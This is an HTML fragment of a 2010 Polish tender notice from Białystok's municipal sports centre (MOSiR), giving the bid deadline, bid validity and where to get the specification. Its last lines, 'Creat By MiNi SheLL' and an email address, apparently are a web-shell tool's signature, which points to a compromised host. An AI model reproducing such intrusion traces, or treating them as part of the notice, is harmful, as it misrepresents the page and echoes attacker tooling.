<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>nie</p>

<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.mosir.bialystok.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Miejski Ośrodek Sportu i Rekreacji w Białymstoku ul. Włókiennicza 4.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 25.05.2010 godzina 12:00, miejsce: Sekretariat Miejskiego Ośrodka Sportu i Rekreacji w Białymstoku ul. Włókiennicza 4.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com